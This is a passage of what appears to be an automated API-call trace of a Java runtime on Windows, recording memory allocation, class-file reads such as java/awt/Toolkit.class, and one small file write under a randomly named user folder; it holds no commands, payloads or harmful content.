0x12ddab60 [0122.740] strlen (_Str="java/lang/ProcessImpl$2.class") returned 0x1d [0122.740] strcpy (in: _Dest=0x208e6e0, _Source="java/lang/ProcessImpl$2.class" | out: _Dest="java/lang/ProcessImpl$2.class") returned="java/lang/ProcessImpl$2.class" [0122.740] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x16b69a9, lpNewFilePointer=0x208e160, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e160*=23816617) returned 1 [0122.740] ReadFile (in: hFile=0x134, lpBuffer=0x208e1b0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208e130, lpOverlapped=0x0 | out: lpBuffer=0x208e1b0*, lpNumberOfBytesRead=0x208e130*=0x1e, lpOverlapped=0x0) returned 1 [0122.741] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x16b69e4, lpNewFilePointer=0x208e1c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e1c0*=23816676) returned 1 [0122.741] ReadFile (in: hFile=0x134, lpBuffer=0x13247e20, nNumberOfBytesToRead=0x751, lpNumberOfBytesRead=0x208e190, lpOverlapped=0x0 | out: lpBuffer=0x13247e20*, lpNumberOfBytesRead=0x208e190*=0x751, lpOverlapped=0x0) returned 1 [0122.742] free (_Block=0x12ef4b10) [0122.742] free (_Block=0x12e5ef70) [0122.770] malloc (_Size=0x48) returned 0x12e5f100 [0122.770] malloc (_Size=0x58) returned 0x130616a0 [0122.770] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0xb07c8, lpNewFilePointer=0x208e080, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e080*=722888) returned 1 [0122.770] ReadFile (in: hFile=0x2c0, lpBuffer=0x130616a0, nNumberOfBytesToRead=0x58, lpNumberOfBytesRead=0x208e050, lpOverlapped=0x0 | out: lpBuffer=0x130616a0*, lpNumberOfBytesRead=0x208e050*=0x58, lpOverlapped=0x0) returned 1 [0122.770] malloc (_Size=0x15) returned 0x12f4fca0 [0122.771] free (_Block=0x12323190) [0122.771] free (_Block=0x1228ec30) [0122.775] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0xb0593, lpNewFilePointer=0x208d2e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d2e0*=722323) returned 1 [0122.775] ReadFile (in: hFile=0x2c0, lpBuffer=0x208d330, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d2b0, lpOverlapped=0x0 | out: lpBuffer=0x208d330*, lpNumberOfBytesRead=0x208d2b0*=0x1e, lpOverlapped=0x0) returned 1 [0122.775] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0xb05c5, lpNewFilePointer=0x208d340, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d340*=722373) returned 1 [0122.775] ReadFile (in: hFile=0x2c0, lpBuffer=0x208d450, nNumberOfBytesToRead=0x12, lpNumberOfBytesRead=0x208d310, lpOverlapped=0x0 | out: lpBuffer=0x208d450*, lpNumberOfBytesRead=0x208d310*=0x12, lpOverlapped=0x0) returned 1 [0122.778] wcslen (_String="C:\\Users\\RDhJ0CNFevzX\\m2rKEl2wJZ.txt") returned 0x24 [0122.778] malloc (_Size=0x54) returned 0x130616a0 [0122.778] wcscpy (in: _Dest=0x130616a0, _Source="C:\\Users\\RDhJ0CNFevzX\\m2rKEl2wJZ.txt" | out: _Dest="C:\\Users\\RDhJ0CNFevzX\\m2rKEl2wJZ.txt") returned="C:\\Users\\RDhJ0CNFevzX\\m2rKEl2wJZ.txt" [0122.778] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\m2rKEl2wJZ.txt" (normalized: "c:\\users\\rdhj0cnfevzx\\m2rkel2wjz.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x30c [0122.780] free (_Block=0x130616a0) [0122.781] WriteFile (in: hFile=0x30c, lpBuffer=0x208d620*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x208d5f0, lpOverlapped=0x0 | out: lpBuffer=0x208d620*, lpNumberOfBytesWritten=0x208d5f0*=0x6, lpOverlapped=0x0) returned 1 [0122.782] CloseHandle (hObject=0x30c) returned 1 [0122.785] strlen (_Str="java/awt/Desktop") returned 0x10 [0122.786] strlen (_Str="java/awt/Desktop.class") returned 0x16 [0122.786] malloc (_Size=0x48) returned 0x12e5f420 [0122.786] malloc (_Size=0xa0) returned 0x12dabf70 [0122.786] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33192b7, lpNewFilePointer=0x208d8f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d8f0*=53580471) returned 1 [0122.786] ReadFile (in: hFile=0x134, lpBuffer=0x12dabf70, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d8c0, lpOverlapped=0x0 | out: lpBuffer=0x12dabf70*, lpNumberOfBytesRead=0x208d8c0*=0xa0, lpOverlapped=0x0) returned 1 [0122.786] malloc (_Size=0x17) returned 0x12f4e120 [0122.787] strlen (_Str="java/awt/Desktop.class") returned 0x16 [0122.787] strcpy (in: _Dest=0x208da70, _Source="java/awt/Desktop.class" | out: _Dest="java/awt/Desktop.class") returned="java/awt/Desktop.class" [0122.787] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x1593e7c, lpNewFilePointer=0x208d4f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d4f0*=22625916) returned 1 [0122.787] ReadFile (in: hFile=0x134, lpBuffer=0x208d540, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d4c0, lpOverlapped=0x0 | out: lpBuffer=0x208d540*, lpNumberOfBytesRead=0x208d4c0*=0x1e, lpOverlapped=0x0) returned 1 [0122.788] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x1593eb0, lpNewFilePointer=0x208d550, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d550*=22625968) returned 1 [0122.788] ReadFile (in: hFile=0x134, lpBuffer=0x1227a470, nNumberOfBytesToRead=0xfe8, lpNumberOfBytesRead=0x208d520, lpOverlapped=0x0 | out: lpBuffer=0x1227a470*, lpNumberOfBytesRead=0x208d520*=0xfe8, lpOverlapped=0x0) returned 1 [0122.789] free (_Block=0x12ddab60) [0122.790] free (_Block=0x12e60b40) [0122.798] strlen (_Str="java/awt/GraphicsEnvironment.class") returned 0x22 [0122.798] malloc (_Size=0x48) returned 0x12e60b40 [0122.798] malloc (_Size=0xa0) returned 0x12dabd60 [0122.798] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3415f7e, lpNewFilePointer=0x208e490, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e490*=54615934) returned 1 [0122.798] ReadFile (in: hFile=0x134, lpBuffer=0x12dabd60, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e460, lpOverlapped=0x0 | out: lpBuffer=0x12dabd60*, lpNumberOfBytesRead=0x208e460*=0xa0, lpOverlapped=0x0) returned 1 [0122.799] malloc (_Size=0x23) returned 0x12ddab00 [0122.800] strlen (_Str="java/awt/GraphicsEnvironment.class") returned 0x22 [0122.800] strcpy (in: _Dest=0x208e610, _Source="java/awt/GraphicsEnvironment.class" | out: _Dest="java/awt/GraphicsEnvironment.class") returned="java/awt/GraphicsEnvironment.class" [0122.800] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x307dedc, lpNewFilePointer=0x208e090, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e090*=50847452) returned 1 [0122.800] ReadFile (in: hFile=0x134, lpBuffer=0x208e0e0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208e060, lpOverlapped=0x0 | out: lpBuffer=0x208e0e0*, lpNumberOfBytesRead=0x208e060*=0x1e, lpOverlapped=0x0) returned 1 [0122.801] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x307df1c, lpNewFilePointer=0x208e0f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e0f0*=50847516) returned 1 [0122.801] ReadFile (in: hFile=0x134, lpBuffer=0x1227a470, nNumberOfBytesToRead=0x1373, lpNumberOfBytesRead=0x208e0c0, lpOverlapped=0x0 | out: lpBuffer=0x1227a470*, lpNumberOfBytesRead=0x208e0c0*=0x1373, lpOverlapped=0x0) returned 1 [0122.802] free (_Block=0x12f4e120) [0122.802] free (_Block=0x12e5f420) [0122.818] strlen (_Str="java/lang/invoke/InnerClassLambdaMetafactory$1.class") returned 0x34 [0122.818] malloc (_Size=0x48) returned 0x12e5f9c0 [0122.818] malloc (_Size=0xa0) returned 0x12dabc00 [0122.818] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3414285, lpNewFilePointer=0x208da30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208da30*=54608517) returned 1 [0122.818] ReadFile (in: hFile=0x134, lpBuffer=0x12dabc00, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208da00, lpOverlapped=0x0 | out: lpBuffer=0x12dabc00*, lpNumberOfBytesRead=0x208da00*=0xa0, lpOverlapped=0x0) returned 1 [0122.818] malloc (_Size=0x35) returned 0x12ef4c90 [0122.819] strlen (_Str="java/lang/invoke/InnerClassLambdaMetafactory$1.class") returned 0x34 [0122.819] strcpy (in: _Dest=0x208dbb0, _Source="java/lang/invoke/InnerClassLambdaMetafactory$1.class" | out: _Dest="java/lang/invoke/InnerClassLambdaMetafactory$1.class") returned="java/lang/invoke/InnerClassLambdaMetafactory$1.class" [0122.819] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x301c2c8, lpNewFilePointer=0x208d630, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d630*=50447048) returned 1 [0122.819] ReadFile (in: hFile=0x134, lpBuffer=0x208d680, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d600, lpOverlapped=0x0 | out: lpBuffer=0x208d680*, lpNumberOfBytesRead=0x208d600*=0x1e, lpOverlapped=0x0) returned 1 [0122.820] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x301c31a, lpNewFilePointer=0x208d690, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d690*=50447130) returned 1 [0122.820] ReadFile (in: hFile=0x134, lpBuffer=0x12d21750, nNumberOfBytesToRead=0x436, lpNumberOfBytesRead=0x208d660, lpOverlapped=0x0 | out: lpBuffer=0x12d21750*, lpNumberOfBytesRead=0x208d660*=0x436, lpOverlapped=0x0) returned 1 [0122.821] free (_Block=0x12ddab00) [0122.821] free (_Block=0x12e60b40) [0122.845] strlen (_Str="java/awt/Toolkit.class") returned 0x16 [0122.845] malloc (_Size=0x48) returned 0x12e60b40 [0122.845] malloc (_Size=0xa0) returned 0x12dab260 [0122.845] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3416d51, lpNewFilePointer=0x208e440, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e440*=54619473) returned 1 [0122.845] ReadFile (in: hFile=0x134, lpBuffer=0x12dab260, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e410, lpOverlapped=0x0 | out: lpBuffer=0x12dab260*, lpNumberOfBytesRead=0x208e410*=0xa0, lpOverlapped=0x0) returned 1 [0122.846] malloc (_Size=0x17) returned 0x12f4e080 [0122.847] strlen (_Str="java/awt/Toolkit.class") returned 0x16 [0122.847] strcpy (in: _Dest=0x208e5c0, _Source="java/awt/Toolkit.class" | out: _Dest="java/awt/Toolkit.class") returned="java/awt/Toolkit.class" [0122.847] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3098925, lpNewFilePointer=0x208e040, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e040*=50956581) returned 1 [0122.847] ReadFile (in: hFile=0x134, lpBuffer=0x208e090, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208e010, lpOverlapped=0x0 | out: lpBuffer=0x208e090*, lpNumberOfBytesRead=0x208e010*=0x1e, lpOverlapped=0x0) returned 1 [0123.270] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3098959, lpNewFilePointer=0x208e0a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e0a0*=50956633) returned 1 [0123.270] ReadFile (in: hFile=0x134, lpBuffer=0x1227a470, nNumberOfBytesToRead=0x3f88, lpNumberOfBytesRead=0x208e070, lpOverlapped=0x0 | out: lpBuffer=0x1227a470*, lpNumberOfBytesRead=0x208e070*=0x3f88, lpOverlapped=0x0) returned 1 [0123.272] free (_Block=0x12ef4c90) [0123.272] free (_Block=0x12e5f9c0) [0123.319] malloc (_Size=0x48) returned 0x12e5ff10 [0123.319] malloc (_Size=0xa0) returned 0x12daace0 [0123.319] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3416d0b, lpNewFilePointer=0x208ddc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ddc0*=54619403) returned 1 [0123.319] ReadFile (in: hFile=0x134, lpBuffer=0x12daace0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208dd90, lpOverlapped=0x0 | out: lpBuffer=0x12daace0*, lpNumberOfBytesRead=0x208dd90*=0xa0, lpOverlapped=0x0) returned 1 [0123.320] malloc (_Size=0x19) returned 0x12ddac80 [0123.320] strlen (_Str="java/awt/Toolkit$4.class") returned 0x18 [0123.320] strcpy (in: _Dest=0x208df40, _Source="java/awt/Toolkit$4.class" | out: _Dest="java/awt/Toolkit$4.class") returned="java/awt/Toolkit$4.class" [0123.320] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x309874e, lpNewFilePointer=0x208d9c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d9c0*=50956110) returned 1 [0123.320] ReadFile (in: hFile=0x134, lpBuffer=0x208da10, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d990, lpOverlapped=0x0 | out: lpBuffer=0x208da10*, lpNumberOfBytesRead=0x208d990*=0x1e, lpOverlapped=0x0) returned 1 [0123.320] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3098784, lpNewFilePointer=0x208da20, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208da20*=50956164) returned 1 [0123.320] ReadFile (in: hFile=0x134, lpBuffer=0x20fe980, nNumberOfBytesToRead=0x1a1, lpNumberOfBytesRead=0x208d9f0, lpOverlapped=0x0 | out: lpBuffer=0x20fe980*, lpNumberOfBytesRead=0x208d9f0*=0x1a1, lpOverlapped=0x0) returned 1 [0123.320] free (_Block=0x12f4e080) [0123.321] free (_Block=0x12e60b40) [0123.321] malloc (_Size=0x48) returned 0x12e60b40 [0123.321] malloc (_Size=0xa0) returned 0x12dab890 [0123.321] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3416cb4, lpNewFilePointer=0x208d300, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d300*=54619316) returned 1 [0123.322] ReadFile (in: hFile=0x134, lpBuffer=0x12dab890, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d2d0, lpOverlapped=0x0 | out: lpBuffer=0x12dab890*, lpNumberOfBytesRead=0x208d2d0*=0xa0, lpOverlapped=0x0) returned 1 [0123.322] malloc (_Size=0x2a) returned 0x12ef4c90 [0123.322] strlen (_Str="sun/awt/AWTAccessor$ToolkitAccessor.class") returned 0x29 [0123.322] strcpy (in: _Dest=0x208d480, _Source="sun/awt/AWTAccessor$ToolkitAccessor.class" | out: _Dest="sun/awt/AWTAccessor$ToolkitAccessor.class") returned="sun/awt/AWTAccessor$ToolkitAccessor.class" [0123.322] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3098627, lpNewFilePointer=0x208cf00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cf00*=50955815) returned 1 [0123.322] ReadFile (in: hFile=0x134, lpBuffer=0x208cf50, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208ced0, lpOverlapped=0x0 | out: lpBuffer=0x208cf50*, lpNumberOfBytesRead=0x208ced0*=0x1e, lpOverlapped=0x0) returned 1 [0123.322] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x309866e, lpNewFilePointer=0x208cf60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cf60*=50955886) returned 1 [0123.322] ReadFile (in: hFile=0x134, lpBuffer=0x1227a5d0, nNumberOfBytesToRead=0xe0, lpNumberOfBytesRead=0x208cf30, lpOverlapped=0x0 | out: lpBuffer=0x1227a5d0*, lpNumberOfBytesRead=0x208cf30*=0xe0, lpOverlapped=0x0) returned 1 [0123.322] free (_Block=0x12ddac80) [0123.323] free (_Block=0x12e5ff10) [0123.324] malloc (_Size=0x48) returned 0x12e5fb00 [0123.324] malloc (_Size=0xa0) returned 0x12dabb50 [0123.324] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3416c6d, lpNewFilePointer=0x208db00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208db00*=54619245) returned 1 [0123.324] ReadFile (in: hFile=0x134, lpBuffer=0x12dabb50, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208dad0, lpOverlapped=0x0 | out: lpBuffer=0x12dabb50*, lpNumberOfBytesRead=0x208dad0*=0xa0, lpOverlapped=0x0) returned 1 [0123.324] malloc (_Size=0x1a) returned 0x12ddaf50 [0123.325] strlen (_Str="sun/awt/AWTAccessor.class") returned 0x19 [0123.325] strcpy (in: _Dest=0x208dc80, _Source="sun/awt/AWTAccessor.class" | out: _Dest="sun/awt/AWTAccessor.class") returned="sun/awt/AWTAccessor.class" [0123.325] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3095a28, lpNewFilePointer=0x208d700, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d700*=50944552) returned 1 [0123.325] ReadFile (in: hFile=0x134, lpBuffer=0x208d750, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d6d0, lpOverlapped=0x0 | out: lpBuffer=0x208d750*, lpNumberOfBytesRead=0x208d6d0*=0x1e, lpOverlapped=0x0) returned 1 [0123.326] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3095a5f, lpNewFilePointer=0x208d760, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d760*=50944607) returned 1 [0123.326] ReadFile (in: hFile=0x134, lpBuffer=0x1227a470, nNumberOfBytesToRead=0x2bc8, lpNumberOfBytesRead=0x208d730, lpOverlapped=0x0 | out: lpBuffer=0x1227a470*, lpNumberOfBytesRead=0x208d730*=0x2bc8, lpOverlapped=0x0) returned 1 [0125.400] free (_Block=0x12ef4c90) [0125.400] free (_Block=0x12e60b40) [0125.435] strlen (_Str="java/awt/Toolkit$5.class") returned 0x18 [0125.435] malloc (_Size=0x48) returned 0x12e60b40 [0125.435] malloc (_Size=0xa0) returned 0x12daafa0 [0125.435] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3416c27, lpNewFilePointer=0x208ddc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ddc0*=54619175) returned 1 [0125.435] ReadFile (in: hFile=0x134, lpBuffer=0x12daafa0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208dd90, lpOverlapped=0x0 | out: lpBuffer=0x12daafa0*, lpNumberOfBytesRead=0x208dd90*=0xa0, lpOverlapped=0x0) returned 1 [0125.435] malloc (_Size=0x19) returned 0x12ddab00 [0125.436] strlen (_Str="java/awt/Toolkit$5.class") returned 0x18 [0125.436] strcpy (in: _Dest=0x208df40, _Source="java/awt/Toolkit$5.class" | out: _Dest="java/awt/Toolkit$5.class") returned="java/awt/Toolkit$5.class" [0125.436] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3095560, lpNewFilePointer=0x208d9c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d9c0*=50943328) returned 1 [0125.436] ReadFile (in: hFile=0x134, lpBuffer=0x208da10, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d990, lpOverlapped=0x0 | out: lpBuffer=0x208da10*, lpNumberOfBytesRead=0x208d990*=0x1e, lpOverlapped=0x0) returned 1 [0125.436] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3095596, lpNewFilePointer=0x208da20, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208da20*=50943382) returned 1 [0125.436] ReadFile (in: hFile=0x134, lpBuffer=0x1227a470, nNumberOfBytesToRead=0x492, lpNumberOfBytesRead=0x208d9f0, lpOverlapped=0x0 | out: lpBuffer=0x1227a470*, lpNumberOfBytesRead=0x208d9f0*=0x492, lpOverlapped=0x0) returned 1 [0125.437] free (_Block=0x12ddaf50) [0125.437] free (_Block=0x12e5fb00) [0125.441] malloc (_Size=0x48) returned 0x12e5eed0 [0125.441] malloc (_Size=0xa0) returned 0x12dab9f0 [0125.441] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3416bd1, lpNewFilePointer=0x208ce90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ce90*=54619089) returned 1 [0125.441] ReadFile (in: hFile=0x134, lpBuffer=0x12dab9f0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208ce60, lpOverlapped=0x0 | out: lpBuffer=0x12dab9f0*, lpNumberOfBytesRead=0x208ce60*=0xa0, lpOverlapped=0x0) returned 1 [0125.441] malloc (_Size=0x29) returned 0x12ef4c90 [0125.441] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3094e71, lpNewFilePointer=0x208ca90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ca90*=50941553) returned 1 [0125.441] ReadFile (in: hFile=0x134, lpBuffer=0x208cae0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208ca60, lpOverlapped=0x0 | out: lpBuffer=0x208cae0*, lpNumberOfBytesRead=0x208ca60*=0x1e, lpOverlapped=0x0) returned 1 [0125.447] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3094eb7, lpNewFilePointer=0x208caf0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208caf0*=50941623) returned 1 [0125.447] ReadFile (in: hFile=0x134, lpBuffer=0x1227a470, nNumberOfBytesToRead=0x6a9, lpNumberOfBytesRead=0x208cac0, lpOverlapped=0x0 | out: lpBuffer=0x1227a470*, lpNumberOfBytesRead=0x208cac0*=0x6a9, lpOverlapped=0x0) returned 1 [0125.448] malloc (_Size=0x48) returned 0x12e60b40 [0125.448] malloc (_Size=0xa0) returned 0x12dac7b0 [0125.448] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3416b7d, lpNewFilePointer=0x208c450, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c450*=54619005) returned 1 [0125.448] ReadFile (in: hFile=0x134, lpBuffer=0x12dac7b0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c420, lpOverlapped=0x0 | out: lpBuffer=0x12dac7b0*, lpNumberOfBytesRead=0x208c420*=0xa0, lpOverlapped=0x0) returned 1 [0125.449] malloc (_Size=0x27) returned 0x12ddb100 [0125.449] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x309344f, lpNewFilePointer=0x208c050, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c050*=50934863) returned 1 [0125.449] ReadFile (in: hFile=0x134, lpBuffer=0x208c0a0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c020, lpOverlapped=0x0 | out: lpBuffer=0x208c0a0*, lpNumberOfBytesRead=0x208c020*=0x1e, lpOverlapped=0x0) returned 1 [0125.449] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3093493, lpNewFilePointer=0x208c0b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c0b0*=50934931) returned 1 [0125.449] ReadFile (in: hFile=0x134, lpBuffer=0x1227ace0, nNumberOfBytesToRead=0x19de, lpNumberOfBytesRead=0x208c080, lpOverlapped=0x0 | out: lpBuffer=0x1227ace0*, lpNumberOfBytesRead=0x208c080*=0x19de, lpOverlapped=0x0) returned 1 [0125.456] malloc (_Size=0x48) returned 0x12e5f510 [0125.456] malloc (_Size=0xa0) returned 0x12daace0 [0125.456] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3416ac8, lpNewFilePointer=0x208c690, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c690*=54618824) returned 1 [0125.456] ReadFile (in: hFile=0x134, lpBuffer=0x12daace0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c660, lpOverlapped=0x0 | out: lpBuffer=0x12daace0*, lpNumberOfBytesRead=0x208c660*=0xa0, lpOverlapped=0x0) returned 1 [0125.456] malloc (_Size=0x3a) returned 0x12e5f560 [0125.457] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3091d1d, lpNewFilePointer=0x208c290, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c290*=50928925) returned 1 [0125.457] ReadFile (in: hFile=0x134, lpBuffer=0x208c2e0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c260, lpOverlapped=0x0 | out: lpBuffer=0x208c2e0*, lpNumberOfBytesRead=0x208c260*=0x1e, lpOverlapped=0x0) returned 1 [0125.458] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3091d74, lpNewFilePointer=0x208c2f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c2f0*=50929012) returned 1 [0125.458] ReadFile (in: hFile=0x134, lpBuffer=0x1227a470, nNumberOfBytesToRead=0xc88, lpNumberOfBytesRead=0x208c2c0, lpOverlapped=0x0 | out: lpBuffer=0x1227a470*, lpNumberOfBytesRead=0x208c2c0*=0xc88, lpOverlapped=0x0) returned 1 [0125.462] malloc (_Size=0x48) returned 0x12e60b40 [0125.462] malloc (_Size=0xa0) returned 0x12dac390 [0125.462] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3416a7c, lpNewFilePointer=0x208ce80, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ce80*=54618748) returned 1 [0125.462] ReadFile (in: hFile=0x134, lpBuffer=0x12dac390, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208ce50, lpOverlapped=0x0 | out: lpBuffer=0x12dac390*, lpNumberOfBytesRead=0x208ce50*=0xa0, lpOverlapped=0x0) returned 1 [0125.462] malloc (_Size=0x1f) returned 0x12dda710 [0125.462] strlen (_Str="java/util/ResourceBundle.class") returned 0x1e [0125.462] strcpy (in: _Dest=0x208d000, _Source="java/util/ResourceBundle.class" | out: _Dest="java/util/ResourceBundle.class") returned="java/util/ResourceBundle.class" [0125.462] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x308ec6d, lpNewFilePointer=0x208ca80, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ca80*=50916461) returned 1 [0125.462] ReadFile (in: hFile=0x134, lpBuffer=0x208cad0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208ca50, lpOverlapped=0x0 | out: lpBuffer=0x208cad0*, lpNumberOfBytesRead=0x208ca50*=0x1e, lpOverlapped=0x0) returned 1 [0125.463] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x308eca9, lpNewFilePointer=0x208cae0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cae0*=50916521) returned 1 [0125.463] ReadFile (in: hFile=0x134, lpBuffer=0x1227a470, nNumberOfBytesToRead=0x3074, lpNumberOfBytesRead=0x208cab0, lpOverlapped=0x0 | out: lpBuffer=0x1227a470*, lpNumberOfBytesRead=0x208cab0*=0x3074, lpOverlapped=0x0) returned 1 [0125.464] free (_Block=0x12e5f560) [0125.465] free (_Block=0x12e5f510) [0125.478] strlen (_Str="java/util/ResourceBundle$1.class") returned 0x20 [0125.478] malloc (_Size=0x48) returned 0x12e5ff10 [0125.478] malloc (_Size=0xa0) returned 0x12dabd60 [0125.478] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3416a2e, lpNewFilePointer=0x208c7e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c7e0*=54618670) returned 1 [0125.478] ReadFile (in: hFile=0x134, lpBuffer=0x12dabd60, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c7b0, lpOverlapped=0x0 | out: lpBuffer=0x12dabd60*, lpNumberOfBytesRead=0x208c7b0*=0xa0, lpOverlapped=0x0) returned 1 [0125.479] malloc (_Size=0x21) returned 0x12ddac20 [0125.479] strlen (_Str="java/util/ResourceBundle$1.class") returned 0x20 [0125.479] strcpy (in: _Dest=0x208c960, _Source="java/util/ResourceBundle$1.class" | out: _Dest="java/util/ResourceBundle$1.class") returned="java/util/ResourceBundle$1.class" [0125.479] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x308ea2b, lpNewFilePointer=0x208c3e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c3e0*=50915883) returned 1 [0125.479] ReadFile (in: hFile=0x134, lpBuffer=0x208c430, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c3b0, lpOverlapped=0x0 | out: lpBuffer=0x208c430*, lpNumberOfBytesRead=0x208c3b0*=0x1e, lpOverlapped=0x0) returned 1 [0125.479] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x308ea69, lpNewFilePointer=0x208c440, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c440*=50915945) returned 1 [0125.479] ReadFile (in: hFile=0x134, lpBuffer=0x20fe990, nNumberOfBytesToRead=0x204, lpNumberOfBytesRead=0x208c410, lpOverlapped=0x0 | out: lpBuffer=0x20fe990*, lpNumberOfBytesRead=0x208c410*=0x204, lpOverlapped=0x0) returned 1 [0125.480] free (_Block=0x12dda710) [0125.480] free (_Block=0x12e60b40) [0125.487] 